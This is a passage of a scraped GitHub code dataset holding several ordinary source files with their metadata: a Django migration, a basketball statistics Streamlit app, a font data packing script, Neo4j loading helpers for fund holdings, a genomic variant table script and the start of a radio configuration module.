{"api_name": "z3c.wizard.interfaces.IWizard", "line_number": 18, "usage_type": "attribute"}, {"api_name": "z3c.wizard.interfaces", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "72265256089", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ContestSubmission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('run_id', models.CharField(max_length=191, blank=True)),\n ('compiler_id', models.CharField(max_length=191, blank=True)),\n ('send_error', models.TextField(null=True, blank=True)),\n ('got_verdict', models.BooleanField(default=False)),\n ('full_response', models.TextField(null=True, blank=True)),\n ('verdict', models.TextField(null=True, blank=True)),\n ('precompile_checks', models.TextField(null=True, blank=True)),\n ('compile_log', models.TextField(null=True, blank=True)),\n ('used_time', models.IntegerField(null=True, blank=True)),\n ('used_memory', models.IntegerField(null=True, blank=True)),\n ('error', models.TextField(null=True, blank=True)),\n ('message', models.TextField(null=True, blank=True)),\n ('test_number', models.IntegerField(null=True, blank=True)),\n ('create_time', models.DateTimeField(auto_now_add=True)),\n ('update_time', models.DateTimeField(auto_now=True)),\n ('sended_notify', models.BooleanField(default=False)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n", "repo_name": "znick/anytask", "sub_path": "anytask/anycontest/migrations/0001_initial.py", "file_name": "0001_initial.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 31, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.swappable_dependency", "line_number": 11, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": 
"django.db.models.TextField", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 33, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 33, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 35, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 35, "usage_type": "name"}, {"api_name": "django.conf.settings.AUTH_USER_MODEL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 35, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "6132581893", "text": "\"\"\"Streamlit application to display a college basketball team's history\nfrom 1985-2020 seasons.\n\"\"\"\nimport streamlit as st\nimport pandas as pd\nimport altair as alt\nfrom db import get_db\nfrom st_functions import get_teams_list, is_ascending_rank\n\n# TODO cache data\n# TODO round fields\n\nif __name__ == \"__main__\":\n st.title(\"Explore a team's history in a variety of metrics!\")\n DB = get_db(config_file_name='docker_database.ini')\n\n # SEASONS = get_seasons_list(_db=DB)\n TEAMS = get_teams_list(_db=DB)\n TEAM = st.sidebar.selectbox(\"Select a team\", TEAMS)\n PREFIX = st.sidebar.selectbox(\"Select a prefix\", ['Tm', 'Opp'])\n PREFIX_LONGSTRING = 'Team' if PREFIX == 'Tm' else 'Opponent'\n OTHER_PREFIX = 'Opp' if PREFIX == 'Tm' else 'Tm'\n METRICS = ['PF', 'Margin',\n 'FGM', 'FGA',\n 'FG3M', 'FG3A',\n 'FG2M', 'FG2A',\n 'FTA', 'FTM',\n 'Ast', 'ORB',\n 'DRB', 'TRB',\n 'TO', 'Stl',\n 'Blk', 'Foul']\n METRIC = st.sidebar.selectbox(\"Select a metric\", METRICS)\n DENOM = st.sidebar.selectbox(\n 'Select a normalization', ['per40', 'perGame', 'perPoss']\n )\n DENOM_FIELD = 'Mins' if DENOM == 'per40' else DENOM[-4:]\n if DENOM == 'perPoss':\n DENOM_LONGSTRING = 'per possession'\n elif DENOM == 'per40':\n DENOM_LONGSTRING = 'per 40 mins'\n elif DENOM == 'perGame':\n DENOM_LONGSTRING = 'per Game'\n\n OA_BOOL = st.sidebar.checkbox(\"Opponent Adjust?\")\n OA_PREF = 'OA_' if OA_BOOL else ''\n OA_LONGSTRING = ' (opponent-adjusted)' if OA_BOOL else ''\n\n NORMALIZE_CONST = 40 if DENOM == 'per40' else 1\n\n # Get results from DB\n season_team_cursor = DB.seasonteams.find(\n {},\n {\n # Get OA metric fields\n PREFIX+METRIC: 1,\n PREFIX+DENOM_FIELD: 1,\n 'OppSum_'+OTHER_PREFIX+METRIC: 1,\n 'OppSum_'+OTHER_PREFIX+DENOM_FIELD: 1,\n # Get W/L record fields\n 'TmWin': 1,\n 'TmGame': 1,\n # Get required aggregate fields\n 'TmName': 1,\n 'Season': 1,\n '_id': 0\n }\n )\n season_team = pd.DataFrame(list(season_team_cursor))\n season_team['Season'] = season_team.Season.astype(str)\n\n # Opponent-adjust selected metric\n season_team[PREFIX+METRIC+DENOM] = season_team[PREFIX+METRIC] / season_team[PREFIX+DENOM_FIELD] * NORMALIZE_CONST\n season_team['OA_'+PREFIX+METRIC+DENOM] = \\\n (season_team[PREFIX+METRIC+DENOM]) - \\\n (\n (season_team['OppSum_'+OTHER_PREFIX+METRIC] - season_team[PREFIX+METRIC]) /\n (season_team['OppSum_'+OTHER_PREFIX+DENOM_FIELD] - season_team[PREFIX+DENOM_FIELD])\n ) * NORMALIZE_CONST\n\n # Determine team's regular-season record\n # TODO update with postseason games\n season_team['TmLoss'] = season_team['TmGame'] - season_team['TmWin']\n season_team['Record'] = season_team['TmWin'].map(str) + '-' + season_team['TmLoss'].map(str)\n\n # Rank each team's values within the season\n season_team['Rnk_'+OA_PREF+PREFIX+METRIC+DENOM] = season_team.groupby(\n 'Season'\n )[OA_PREF+PREFIX+METRIC+DENOM].rank(\n 'min', ascending=is_ascending_rank(PREFIX, METRIC)\n )\n\n # Create chart\n season_team_chart = season_team.loc[season_team.TmName == TEAM]\n TITLE_STRING = f\"{TEAM}: Rank of {PREFIX_LONGSTRING}'s {METRIC} {DENOM_LONGSTRING+OA_LONGSTRING} [1 is best]\"\n chart = alt.Chart(\n data=season_team_chart, \n title=TITLE_STRING\n ).mark_line(\n point=True\n ).encode(\n alt.X('Season'),\n alt.Y('Rnk_'+OA_PREF+PREFIX+METRIC+DENOM,\n scale=alt.Scale(domain=(353,1)),\n axis=alt.Axis(title='Rank')),\n tooltip=['Season',\n 'Record', \n OA_PREF+PREFIX+METRIC+DENOM, \n 'Rnk_'+OA_PREF+PREFIX+METRIC+DENOM]\n ).interactive()\n\n st.altair_chart(chart)\n", "repo_name": 
"ryanofarrell/ncaa-basketball", "sub_path": "code/streamlit/st_team_history.py", "file_name": "st_team_history.py", "file_ext": "py", "file_size_in_byte": 3969, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "streamlit.title", "line_number": 14, "usage_type": "call"}, {"api_name": "db.get_db", "line_number": 15, "usage_type": "call"}, {"api_name": "st_functions.get_teams_list", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 19, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 19, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 20, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 20, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 32, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 32, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 33, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 33, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 44, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "st_functions.is_ascending_rank", "line_number": 89, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 95, "usage_type": "call"}, {"api_name": "altair.X", "line_number": 101, "usage_type": "call"}, {"api_name": "altair.Y", "line_number": 102, "usage_type": "call"}, {"api_name": "altair.Scale", "line_number": 103, "usage_type": "call"}, {"api_name": "altair.Axis", "line_number": 104, "usage_type": "call"}, {"api_name": "streamlit.altair_chart", "line_number": 111, "usage_type": "call"}]}
+{"seq_id": "20951794574", "text": "import sys\nimport os\nfrom time import gmtime, strftime\nimport re\nimport base64\nimport argparse\nimport glob\n\n##################\n# Argument Setup\n##################\nparser = argparse.ArgumentParser(description=\"SignWriting 2010 packing script takes a directory of files and writes a single data file.\"\n\t,epilog=\"Source SVG and completed TTF available online https://github.com/slevinski/signwriting_2010_fonts\")\nparser.add_argument(\"directory\", nargs=\"?\", help=\"name of the sub-directory in sources for the subfont files\")\nparser.add_argument(\"-f\",\"--force\", help=\"overwrite existing font files\", action=\"store_true\")\nparser.add_argument(\"-n\",\"--name\", metavar=\"filename\", help=\"name of data file\")\nparser.add_argument(\"-m\",\"--minimize\", metavar=\"factor\", help=\"for SVG, minimization factor for coordinate space\")\nparser.add_argument(\"-p\",\"--precision\", help=\"for SVG, number of decimal places for rounding\", default=\"NA\")\nparser.add_argument(\"-s\",\"--simplify\", help=\"for SVG, remove extra text\", action=\"store_true\")\nparser.add_argument(\"-t\",\"--test\", help=\"write one example to the screen\", action=\"store_true\")\nparser.add_argument(\"-r\",\"--reserved\", default=\"SignWriting 2010\", help=\"Reserved Font Name, default of %(default)s\")\n\nargs = parser.parse_args()\n\n\n\n##################\n# # initializing\n##################\nsourceDir = \"../source/\"\n\nif not args.directory:\n\tdirectories = next(os.walk( os.path.join(sourceDir,'.')))[1]\n\tdirectories.remove('other_svg')\n\tdirectories.remove('templates')\n\tif not len(directories):\n\t\tprint(\"\")\n\t\tprint(\"FAILURE: no directory available for packing \" + sourceDir)\n\telse:\n\t\tprint()\n\t\tprint(\"Please specify a directory from \" + sourceDir)\n\n\t\tfor dir in directories:\n\t\t\tprint(\"python pack.py \" + dir)\n\tsys.exit()\n\nfontDir = sourceDir + args.directory + \"/\"\nif args.name:\n\targs.directory = args.name\n\next = (args.directory[:3]).lower()\n\ndataFile = sourceDir + args.directory + \".dat\"\n\nif os.path.exists(dataFile) and not args.test:\n\tif args.force:\n\t\tprint(\"Overwriting data file \" + dataFile)\n\telse:\n\t\tprint()\n\t\tprint(\"FAILURE: Data file already exists: \" + dataFile)\n\t\tprint(\"Move file or use -f to force the file creation\")\n\t\tprint()\n\t\tsys.exit(-1)\n\nif os.path.exists(fontDir):\n\tprint(\"input directory \" + fontDir)\n\tprint(\"output data file \" + dataFile)\nelse:\n\tprint(f\"FAILURE: directory {fontDir} does not exist\")\n\tsys.exit(-1)\n\nif not args.test:\n\tsys.stdout = open(dataFile,'w') #redirect all prints to this log file\n\nprint(\"# SignWriting 2010 is released under the SIL Open Font License, Version 1.1.\")\nprint(\"# http://scripts.sil.org/OFL\")\nprint(\"#\")\nprint(\"# This Font Software is Copyright (c) 1974-2014\")\nprint(\"# Center For Sutton Movement Writing, Inc.\")\nprint(\"#\")\nprint(\"# The symbols of SignWriting 2010 were designed by Valerie Sutton (sutton@signwriting.org),\")\nprint(\"#\\t inventor of the SignWriting Script\")\nprint(\"#\")\nprint(\"# The symbol images were refined by Adam Frost (frost@signwriting.org).\")\nprint(\"#\")\nprint(\"# The symbols were encoded, transformed, and refactored by Stephen E Slevinski Jr (slevin@signpuddle.net).\")\nprint(\"#\")\nprint(\"# Reserved Font Name: \" + args.reserved)\nprint(\"#\")\nprint(\"# SignWriting 2010 Packed Data\")\nprint(\"# ------------------------------------\")\nprint(\"#\\tinput 
directory: \" + args.directory)\nprint(\"#\\toutput data file: \" + dataFile.replace(sourceDir,\"\"))\nprint(\"#\\tprocessed: \" + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\nprint(\"# ------------------------------------\")\nprint(\"# https://github.com/slevinski/signwriting_2010_tools\")\nprint(\"#\")\nprint(\"# created with command:\",)\nfor item in sys.argv:\n\tif \" \" in item:\n\t\tprint(f'\"{item}\"')\n\telse:\n\t\tprint(item)\nprint()\nprint(\"#\")\nfiles = glob.glob(fontDir + \"*\" + ext)\nfor file in files:\n\tname = file.split('/')[-1].split('.')[0]\n\twith open(file, \"rb\") as image_file:\n\t\tdata = image_file.read()\n\t\tif not ext==\"svg\":\n\t\t\tencoded_string = base64.b64encode(data).decode(\"ascii\")\n\t\t\tprint(name + \"\\t\" + encoded_string)\n\t\telse:\n\t\t\t#cleanup for various svg sources\n\t\t\tdata = data.decode(\"utf-8\").replace(\"\\n\",\" \")\n\t\t\tstart = data.index(\"<g\")\n\t\t\tend = data.index(\"</g>\", start)+4\n\t\t\tglines = data[start:end]\n\t\t\tif args.precision != \"NA\":\n\t\t\t\tglines = re.sub(r'\\.[0-9]+',\n\t\t\t\tlambda m: ((\"%.\" + args.precision + \"f\") % float(m.group().strip()))[1:],\n\t\t\t\tglines).replace(\".\" + \"0\"*int(args.precision),\"\")\n\t\t\tif args.simplify:\n\t\t\t\tglines = glines.replace(' fill=\"#000000\" stroke=\"none\"',\"\")\n\t\t\tif args.minimize:\n\t\t\t\tstart = glines.index(\"translate(\")\n\t\t\t\tend = glines.index(\")\", start)+1\n\t\t\t\ttranslate =glines[start:end]\n\t\t\t\tstart = translate.index(\"(\")+1\n\t\t\t\tend = translate.index(\",\", start)\n\t\t\t\ttransx =int(translate[start:end])/int(args.minimize)\n\t\t\t\tstart = translate.index(\",\")+1\n\t\t\t\tend = translate.index(\")\", start)\n\t\t\t\ttransy =int(translate[start:end])/int(args.minimize)\n\t\t\t\tglines = glines.replace(translate,\"translate(\" + str(transx) + \",\" + str(transy) + \")\")\n\n\t\t\t\tstart = glines.index(\"scale(\")\n\t\t\t\tend = glines.index(\")\", start)+1\n\t\t\t\tscale =glines[start:end]\n\t\t\t\tstart = scale.index(\"(\")+1\n\t\t\t\tend = scale.index(\",\", start)\n\t\t\t\tscalex =float(scale[start:end])/int(args.minimize)\n\t\t\t\tstart = scale.index(\",\")+1\n\t\t\t\tend = scale.index(\")\", start)\n\t\t\t\tscaley =float(scale[start:end])/int(args.minimize)\n\t\t\t\tglines=glines.replace(scale,\"scale(\" + str(scalex) + \",\" + str(scaley) + \")\")\n\n\t\t\tprint(name + \"\\t\" + glines)\n\t\tif args.test:\n\t\t\tsys.exit()\n", "repo_name": "Slevinski/signwriting_2010_tools", "sub_path": "tools/pack.py", "file_name": "pack.py", "file_ext": "py", "file_size_in_byte": 5354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 73, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 94, 
"usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 99, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 106, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 112, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 151, "usage_type": "call"}]}
+{"seq_id": "20490580711", "text": "\n# coding: utf-8\n\n\nfrom py2neo import Graph, Node, Relationship, GraphService\nimport os\nfrom tqdm import tqdm\nimport re\n\nNEO4J_USER = 'neo4j'\nNEO4J_PASSWORD = '123456'\nNEO4J_HOST = 'localhost'\n\n\nclass NeoGraph:\n    def __init__(self, gcp=None):\n        if gcp:\n            #self.g = Graph('bolt://neo4j:123456@35.230.134.163:7687')\n            self.g = Graph(host=gcp['NEO4J_HOST'], port=gcp['NEO4J_PORT'], user=gcp['NEO4J_USER'],\n                           password=gcp['NEO4J_PASSWORD'])\n        else:\n            self.g = Graph(host=NEO4J_HOST, user=NEO4J_USER,\n                           password=NEO4J_PASSWORD)\n\n    def truncate(self):\n        \"\"\"Remove all nodes in the graph\"\"\"\n        print(\"----- Truncating graph -----\")\n        tx = self.g.begin()\n        result = tx.run('MATCH (n) DETACH DELETE n')\n        tx.commit()\n        return result\n\n    def add_companies(self, df):\n        print(\"----- Starting Add companies process -----\")\n        tx = self.g.begin()\n        for _, x in tqdm(df.iterrows(), total=len(df)):\n            if x['ticker'] != \"NA\":\n                n = Node(\"Ticker\", name=x['ticker'], company=x['name'],\n                         sector=x['sector'], variation_coefficient=x['var_coef'])\n                tx.create(n)\n        tx.commit()\n        self.g.run(\"CREATE INDEX ON :Ticker(name)\")\n        print(\"----- Add companies process complete -----\")\n\n    def create_links(self, df):\n        print(\"----- Starting relationship creation process -----\")\n        for _, x in tqdm(df.iterrows(), total=df.shape[0]):\n            cypher = f\"MATCH (s1:Ticker {{name:\\'{x['ticker1']}\\'}}),(s2:Ticker {{name:\\'{x['ticker2']}\\'}}) CREATE (s1)-[:CORR {{corr : {x['cor']}, id : '{x['id']}'}}]->(s2)\"\n            self.g.run(cypher)\n        print(\"----- Relationship creation process complete -----\")\n\n    def add_tickers(self, df):\n        print(\"----- Starting Add tickers process -----\")\n        tx = self.g.begin()\n        for _, x in tqdm(df.iterrows(), total=len(df)):\n\n            n = Node(\"Ticker\", ticker=x['ticker'], company=x['name'],\n                     sector=x['sector'], )\n            tx.create(n)\n        tx.commit()\n        self.g.run(\"CREATE INDEX ON :Ticker(ticker)\")\n        print(\"----- Add tickers process complete -----\")\n\n    def add_funds(self, df):\n        print(\"----- Starting Add Funds process -----\")\n        tx = self.g.begin()\n        for _, x in tqdm(df.iterrows(), total=len(df)):\n\n            n = Node(\"Fund\", name=x['name'])\n            tx.create(n)\n        tx.commit()\n        print(\"----- Add Funds process complete -----\")\n\n    def link_funds_to_tickers(self, funds_tickers):\n        print(\"----- Starting relationship creation process -----\")\n        for fund in tqdm(funds_tickers, total=len(funds_tickers)):\n            print(fund)\n            for x in funds_tickers[fund]:\n                if x['TICKER'] and x['VALUE'] > 0:\n\n                    if re.sub('[^a-zA-Z]+', '', x['PUT/CALL']):\n                        pc = re.sub('[^a-zA-Z]+', '',\n                                    x['PUT/CALL']).upper()\n                        cypher = f\"MATCH (f1:Fund {{name:\\'{fund}\\'}}),(t1:Ticker {{ticker:\\'{x['TICKER']}\\'}}) CREATE (f1)-[:INVESTMENT {{valuex$1000 : {x['VALUE']}, shares : {x['SHARES']}, put_call : '{pc}'}}]->(t1)\"\n                    else:\n                        cypher = f\"MATCH (f1:Fund {{name:\\'{fund}\\'}}),(t1:Ticker {{ticker:\\'{x['TICKER']}\\'}}) CREATE (f1)-[:INVESTMENT {{valuex$1000 : {x['VALUE']}, shares : {x['SHARES']}}}]->(t1)\"\n                    try:\n                        self.g.run(cypher)\n                    except:\n                        print(\"Failed \", fund, x)\n        print(\"----- Relationship creation process complete -----\")\n", "repo_name": "DL4L/13F-Network", "sub_path": "neo4j_funcs.py", "file_name": "neo4j_funcs.py", "file_ext": "py", "file_size_in_byte": 3722, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "py2neo.Graph", "line_number": 19, "usage_type": "call"}, {"api_name": "py2neo.Graph", "line_number": 22, 
"usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 36, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 38, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 47, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 55, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 57, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, {"api_name": "py2neo.Node", "line_number": 69, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 76, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "14595206216", "text": "#!/usr/bin/env python3\n\"\"\"\n Get table of allele presence/absence from an MAF file.\n\"\"\"\n\nimport argparse\nimport collections\nimport gzip\nimport itertools\nimport sys\n\nMafSeq = collections.namedtuple('MafSeq', 'seq_name start aligned_bases strand contig_length seq')\n\ndef parse_maf_haplotypes(ih):\n record = {'a':{}, 'haplotypes':collections.defaultdict(set),\n 'strain_count':collections.defaultdict(int)}\n for line in ih:\n if line.startswith('a'):\n if len(record['haplotypes']) > 0:\n yield record\n record = {'a':{}, 'haplotypes':collections.defaultdict(set),\n 'strain_count':collections.defaultdict(int)}\n record['a'] = {x.split('=')[0]:x.split('=')[1] for x in line.strip().split()[1:]}\n elif line.startswith('s'):\n fields = line.strip().split()[1:]\n strain = fields[0].split('.')[0]\n record['strain_count'][strain] += 1\n record['haplotypes'][fields[5]].add(strain)\n else:\n continue\n yield record\n\ndef get_vars_from_haplotypes(haplotypes):\n h = list(haplotypes.items())\n l = len(h[0][0])\n ret = {}\n\n ## First find SNPs\n snps = []\n for i in range(l):\n alleles = collections.defaultdict(set)\n for j in range(len(h)):\n b = (h[j][0][i]).upper()\n if b not in {'A', 'T', 'C', 'G'}:\n continue\n alleles[b].add(j)\n if len(alleles) > 1:\n for a, idxs in alleles.items():\n snps.append((str(i) + '-' + a, idxs))\n ret[str(i+1) + '-' + a + '-snp'] = set()\n for j in idxs:\n for s in h[j][1]:\n ret[str(i+1) + '-' + a + '-snp'].add(s)\n\n ## Then find indels\n indels = collections.defaultdict(set)\n for j in range(len(h)):\n d = False\n s = None\n e = None\n for i in range(l):\n b = (h[j][0][i])\n if (b != '-' or i == l-1) and d:\n e = i\n if e == l-1: e +=1\n indels[(s+1, e)].add(j)\n d = False\n elif b == '-' and not d:\n s = i\n d = True\n\n ## Produce output table\n for se, idxs in sorted(indels.items()):\n drs = '_'.join(map(str, se)) + '-del'\n irs = '_'.join(map(str, se)) + '-ins'\n ret[drs] = set()\n ret[irs] = set()\n done = set()\n for j in idxs:\n done.add(j)\n for s in h[j][1]:\n ret[drs].add(s)\n for j in range(len(h)):\n if j not in done:\n for s in h[j][1]:\n ret[irs].add(s)\n\n return ret\n\n\n\nparser = argparse.ArgumentParser(usage=__doc__)\nparser.add_argument('maf')\nparser.add_argument('strains')\nargs = parser.parse_args()\n\n\nstrains = []\nwith open(args.strains, 'rt') as h:\n for line in h:\n strains.append(line.strip())\n\nsys.stdout.write('contig\\tpos\\trs\\t' + '\\t'.join(strains) + '\\n')\nopen_fun = open\nif args.maf.endswith('.gz'):\n open_fun = gzip.open\nwith open_fun(args.maf, 'rt') as ih:\n for record in parse_maf_haplotypes(ih):\n var_table = get_vars_from_haplotypes(record['haplotypes'])\n for rs, strain_list in var_table.items():\n sys.stdout.write(record['a']['label'] + '\\t' +\n rs.split('-')[0] + '\\t' +\n record['a']['label'] + '-' + rs)\n for strain in strains:\n if strain in strain_list:\n sys.stdout.write('\\t1')\n else:\n sys.stdout.write('\\t0')\n sys.stdout.write('\\n')\n sys.stdout.write(record['a']['label'] + '\\t' +\n '0' + '\\t' +\n record['a']['label'] + '-copynumber')\n for strain in strains:\n sys.stdout.write('\\t' + str(record['strain_count'][strain]))\n sys.stdout.write('\\n')\n", "repo_name": "brendane/asymmetric_selection_manuscript_code_for_review", "sub_path": "ensifer_variants/helper_scripts/variants_from_maf.py", "file_name": "variants_from_maf.py", "file_ext": "py", "file_size_in_byte": 3985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": 
"github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 15, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 16, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 21, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 41, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 56, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 103, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 103, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 106, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 111, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 116, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 120, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 124, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 125, "usage_type": "attribute"}]}
+{"seq_id": "36172664618", "text": "# Contains the logic for unpacking the user configuration file\n__author__ = \"Matteo Golin\"\n\n# Imports\nimport json\nfrom dataclasses import dataclass, field\nfrom enum import StrEnum\nfrom typing import Any, Self\n\n# Constants (note that trailing +1 is for inclusivity in range() object)\nPOWER_RANGE: tuple[int, int] = (-3, 16 + 1)\nVALID_SPREADING_FACTORS: list[int] = [7, 8, 9, 10, 11, 12]\nVALID_BANDWIDTHS: list[int] = [125, 250, 500]\nSYNC_RANGE: tuple[int, int] = (0, 256 + 1)\nPREAMBLE_RANGE: tuple[int, int] = (0, 65_535 + 1)\nLF_RANGE: tuple[int, int] = (433_050_000, 434_790_000 + 1)\nHF_RANGE: tuple[int, int] = (863_000_000, 870_000_000 + 1)\n\n# Types\nJSON = dict[str, Any]\n\n\nclass ModulationModes(StrEnum):\n    \"\"\"Modulation types for the RN2483 radio.\"\"\"\n\n    LORA = \"lora\"\n    FSK = \"fsk\"\n\n\nclass CodingRates(StrEnum):\n    \"\"\"Coding rates for the RN2483 radio.\"\"\"\n\n    FOUR_FIFTHS = 